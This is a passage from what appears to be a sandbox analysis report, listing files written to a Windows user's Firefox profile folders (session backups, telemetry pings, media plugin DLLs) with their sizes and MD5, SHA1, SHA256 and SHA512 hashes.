SHA51249f02f23f837a4aaab254099902c2973d064d8dd2fbe5f0b18a901a501037421704206379881418545b5d1fb9b69be342b880be9a88c525d0c1ed1d6a72dd84f
-
Filesize
1.1MB
MD5c69217ae6199999e0a34bda6ad673cb3
SHA1818efb02f6497e33c4ec6a1ffe1487dc9223f003
SHA2564f3b55fd35c9d7561ca0fd2b7a9c0660046e7f77e5752cebb250703efd5fbc9d
SHA51233a87a28d013affb407cde048384e7a60c716c378d931455e9ddb7f4cced8230a72a90d825d35db308895a82652c0867b6b4d0ef0f5810bfa524903eeb2ef826
-
Filesize
9KB
MD5658f4835a1fd3af850f7863b23914298
SHA19c0668bc98ee1261df23d6691eeead262f738214
SHA2562071d8139b32578de5bb474439c6d4abbc25069fd7dc11cd85c0b2214ada0a80
SHA512157bb8b11032911862c27ce56dfc6092c96d6e12f6fb51f379f7cf065c6ae1ebaf505cd40ce4b7aad05662918e4869e8212e57985828fe331015695a06c04fb1
-
Filesize
479KB
MD509372174e83dbbf696ee732fd2e875bb
SHA1ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1
-
Filesize
13.8MB
MD50a8747a2ac9ac08ae9508f36c6d75692
SHA1b287a96fd6cc12433adb42193dfe06111c38eaf0
SHA25632d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03
SHA51259521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d
-
Filesize
330KB
MD5aee2a2249e20bc880ea2e174c627a826
SHA1aa87ed4403e676ce4f4199e3f9142aeba43b26d9
SHA2564d9c00fc77e231366228a938868306a71383967472d0bbf1a89afe390d80599c
SHA5124e96c2aa60cc1904ac5c86389f5d1226baf4ef81e2027369979ec253b383eccc666da268647843d1db128af16d1504cdc7c77757ad4147a0332ec9f90041a110
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\56i567ym.default-release\AlternateServices.bin
Filesize10KB
MD553ed92ac79f621574fec984a848ec884
SHA15bffd731197bb4debcdc5dd9e5e18e0f2074a8c2
SHA256428f0f60dc6424f7a7f856d9940e57377f0b8286a7c5ab6dad2e91c7c7808094
SHA51288da9083acdfa1b2efc154cd4dcd531cb5ea09c6dbf2a5963694a0f7d316c00cab9ac0be32378b70db9964d65467fc617ae184e70742197aca1639906b9f6a3f
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\56i567ym.default-release\AlternateServices.bin
Filesize13KB
MD52029853a0efbf03f9404960070a66d66
SHA1139151122a65ca474443373485711c4bf4ff72b4
SHA2564553d14f45d176921566a3cd9c763398090b6ff28a295e49f4d926fe96c8c0b1
SHA5122c8e76b9f3ab29dc19244a8e5d0e268bb57d462ef23dc68487b3daae5b54381515d492dca9e7e39a98562be9ef95b3a7f6de89bd0894bd61f9f1d7a8f754e934
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\56i567ym.default-release\AlternateServices.bin
Filesize23KB
MD5a078fb4331558c86ee526f8847a9dd08
SHA125ad636e4937e039df69e2c56365e6130a3e4142
SHA25621d6fe2e16a86c83c0bb6cc697e8c68ac8b60a2f78e426ba9cc89875e9b1ab7e
SHA5121ce8c47318927eff03625de1eb56ad2a7faab9870606a53148be77858041eecfe76b88515eaa58fd42821662acd7d2b3283ea73ec30540d5e599d1f51c1f22d2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\56i567ym.default-release\datareporting\glean\db\data.safe.tmp
Filesize5KB
MD53974a79cbdf5fc27bc9ad67159ffac25
SHA191f589099e01887d6ebd7a87702aa5d8b35b64c1
SHA25639d33c41b7877e435817e03768e2a2d111bfd64d1132e39285324cf2cc646f05
SHA5120ffd3bb3bbeadde54273dd55fcaaf4b529a821c3b43268ae93b4d82f12cbbfa319b58a78c44eb585a6283804ee7b27b3f28432b95c415a0a55ad28d8eeb6eb8d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\56i567ym.default-release\datareporting\glean\db\data.safe.tmp
Filesize6KB
MD5d3878510621a3845b9c253c41431300c
SHA10ffb1a3ecbf4cab657cf4f779f23ae3566c78eb1
SHA256cf0fd079e36609d6bc4c2e01db80a821dd94aff86f86d55065edf8b00064be68
SHA5125b6d867683f6548b169903b65c6848f07be366adbd1feaa27d2c3127fa1d2ed8bea720aa3ee02570a9ddc913f0b4f2a3aa4f6ee39d57876c550943ea66b86754
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\56i567ym.default-release\datareporting\glean\db\data.safe.tmp
Filesize6KB
MD5612a96946219ff28122426163bfafad7
SHA1e680633bd23c1d0a8249de9c89260023111e9f6b
SHA256d09e8c93cfbcf765401345de6005d3502b0b09aa0601f7130abd968fe9d6aa89
SHA512f6e8f29e9ccd17914db886f7d5963026d3d1c77fd6b2f5badacb562a4945a784209e387e3c86d9132398a32651b2d827d27009745b50baa6d2cad2ab4229dcbc
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\56i567ym.default-release\datareporting\glean\pending_pings\8a474808-c52a-4e2d-8157-6fdacf689c15
Filesize671B
MD5439f2494f2ed0c66afdfa0f91884318a
SHA125c5e3ac1667a80d4be7d78289b59026962865f6
SHA256dca8d3ab91060ab414d7420bbfeab7d2c09eea137004ce6daeed1cd4459913a5
SHA5126f960f03275c03e4e7e32b7ba23b1e9b7b21ffad4c4f3f322266b5eb13aa0cc669ca392c2178eb09962d4b3d84f9ee9ec43ef5d94813293f275808571c98a022
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\56i567ym.default-release\datareporting\glean\pending_pings\909f2c7e-7cb0-4d21-8955-56e0562c324f
Filesize26KB
MD5dc54ccee4a9cf9dceff7ac940845ccf4
SHA1ac6ff7fd5ca371c59e6166fd5d6997b36eb3ac44
SHA256bd67efb0969eab0ab3561826e93edc07b03fc17d2f5d4297bcbb7f2c00e7ee8c
SHA512cc5f1f393a7da8fd3b1c7e5f9deb0cc1d4fb206fd533acb4d1bb1d496a9a230bbfa0b3fdf627059e3fc9f9323875ed1ed82bd7d211762c73bf1893f5fc9a04d2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\56i567ym.default-release\datareporting\glean\pending_pings\a8caf373-f771-4a29-9b0d-277307b8c5a9
Filesize982B
MD53dd9aad593bcc1b8b3a7a32cd62f34b0
SHA169cd93f596fc4e1dd673ab5bc776a21353db7041
SHA256d03ad65369e25acefcdcb95d32dc0bcbc38146320dafaa05c28062a284f68721
SHA5124ab86507d660accd593a6be7215b9c54061604270a10ddd1e8ea800bd620c8eec753791c285b14e6f13ac845695bee11441f4a48f713e691840733b619836bca
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\56i567ym.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
Filesize1.1MB
MD5842039753bf41fa5e11b3a1383061a87
SHA13e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\56i567ym.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
Filesize116B
MD52a461e9eb87fd1955cea740a3444ee7a
SHA1b10755914c713f5a4677494dbe8a686ed458c3c5
SHA2564107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA51234f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\56i567ym.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
Filesize372B
MD5bf957ad58b55f64219ab3f793e374316
SHA1a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA51279c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\56i567ym.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
Filesize17.8MB
MD5daf7ef3acccab478aaa7d6dc1c60f865
SHA1f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA5125840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75
-
Filesize
10KB
MD5f687a40cf3ad9fdd181c59eed1ded89b
SHA1965146f11ee1a52728d9589a10174f0c7b7ee937
SHA256ffe35c13955b3b40953e34223135e15297d96e9a899c2e740ce3dc7b0c4c5572
SHA512f3e4414d4e40c33458f1f9b71e6ac2af426c11448258f04acd7d8c8da621e68b4a4922dde27da4cca3ca7b467f2e61edfa3c9a968ed96b9caa63735461889a7f
-
Filesize
10KB
MD5f5603e656c3254e8c5ec4929b0ae80df
SHA1a05f4febb977e41b648a22aef4df04aa58d000f3
SHA256da63b843f45ba5e55923f5c9ac824efe79a80cd7f43d4107e8dece3f7ab14a99
SHA512e1f3f7558e51a8b2bf3b19e7dbfc354ee9672b713a99bd9c4be84e4ab084705f6b718ed2e277da16ad325748b6f1388b7031da24c64c8116d2769dd2b8e72660
-
Filesize
9KB
MD5c16128293b74e637279b2bd84aebd93f
SHA1b4250d552aef3bd6c21230b148b5397c85d9ac8a
SHA25664815cf0097e036fdbd6236624b9be77bc335721561234267f1611c6befff2d7
SHA5125f65a09063f96b5e5da85c1d3ba4e792f9cfd7d2596f71a578f578058c165206209f1750d649d6e7dc006e71702400cacf127045acb6868d8a3e4138ceca7a1a
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\56i567ym.default-release\sessionstore-backups\recovery.baklz4
Filesize4KB
MD5bea90919aaf5426ac5daba5b68a09800
SHA1f93da0572e6a4c3ef03b9855c88bfa8626d13cb7
SHA2564edc1165e04005d58b2633980494552e1d349ecd9b269b71c1ebebcc02ec013b
SHA512be86216e5b33e15301f5764811bdcb844502946c3f7850b0fa208f9a4fb1b9beae3f60230fd150aeeac1875c389efd904dc89b56e24139c1ad8a49cdee642efa
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\56i567ym.default-release\sessionstore-backups\recovery.baklz4
Filesize12KB
MD54cca08b802362ef6e2f1f0617ce68fe0
SHA180eac2dcaf42f70eba1acb75693cd0a79610a93b
SHA25670619f9aa232a4075c5df2f057891f0c694e39a783dc669359c617b55dcf5031
SHA5127af2b94b3e68c610de9fbdce5716e23da897a4f55b27ab48c8bd98da7028bc5d5ab83fa8e966cc8227ff856194cf5e050dd9fad3be527b13b1a43c69314ce907
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\56i567ym.default-release\sessionstore-backups\recovery.baklz4
Filesize12KB
MD551c9ba9f6436a48540829e09208068e4
SHA17e9a9dac85e73aa1ddf3b9d0357f5e63ed9eb107
SHA2568b434f26035804391e01474639986b25d5c952b4056e1ca999de0405dc69c35d
SHA512754e395a4d4a6c19485c6227464849caef41b4c469c720b61bf4e8c269f7cd95cd5fde91b908b023114bfba76894e6aa5201c62ba4c48404da4bcf0994f14916
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\56i567ym.default-release\sessionstore-backups\recovery.baklz4
Filesize13KB
MD5f52c1cae1eb6a923923da912ef3805e8
SHA17146b8ead35309f96bf49e90647c62cdb59a1012
SHA256cf3732f45d27d8ca576983fad7b15cc7a1af2a97375d1107e4406bafcc1cac8a
SHA51205538afef39a064543e361e355e716f3edc78ae48525b5704a33104cf01d9dece0aab742b3bcd027f157e66de6e278226c9956fbff2f466428c4aec62a75546c
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\56i567ym.default-release\sessionstore-backups\recovery.baklz4
Filesize11KB
MD593c8188f5fe487362f27056a8c4a07a0
SHA164ff94e2e93624a4a2a65e721640ec3b914ad604
SHA256a252e880b16d4f69ee3d2378ccda04d4e210611dbb36560b13d6f3acc29c5bf9
SHA5129fd97499f3bb0817c15b824dcf84e9b1485367ee8a46cbf935eaf773e8988647f671c932fef11b67bff857c034fe21d1f565b56888cbc81628fc71bfb8990d90
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\56i567ym.default-release\sessionstore-backups\recovery.baklz4
Filesize12KB
MD5824d5e8cf203430a859006fe528a6e3f
SHA1ae88959327a088073481ab789b595768784a34f0
SHA25668ec3c38f4b8d9bc508a021bbc5944ae6be596a37fc285610aba740f06197a3f
SHA51286a22d9e6ca6ac066f0f451dbff5c70fe0371891bac09110bcb3abdf60e4bd4a70e1323f999cbe6aa6c300532601ef432858b84a08460a34c6b53c6e8ebaa5a6
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\56i567ym.default-release\sessionstore-backups\recovery.baklz4
Filesize13KB
MD5764939b69314e8881e79d007743ff30a
SHA1d4d5794946fba7d22dc890e0b369be8d3c9de499
SHA2560351301795ebdc25551e48f3c8f08d131375d5fe22742892ab53c343d18f9bf6
SHA512f6417a95597b25f571995f9b86822a95200acfa85061f9d7334897eebe1c912c2c023c44ae8c78c7b6e17531ac40bf1c1f4760656188e0ecbdd54816adc0ae81
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\56i567ym.default-release\sessionstore-backups\recovery.baklz4
Filesize17KB
MD5817742b3815f806d23263ac487e567c0
SHA1861f23ad31724793919c5d14a7e291da6865dfc8
SHA256e0d32b7db21eec888e5c2269f823492419e1121e5ebed1711bc2ed32dc007fcc
SHA51241b410920158b9c13d4807b58b0a872131e11148ef99583ddc9f7f00b0788e5ba5ede8578f36761be58c834a02cdffb2c03c10841ecc8f313245c0024eccb40b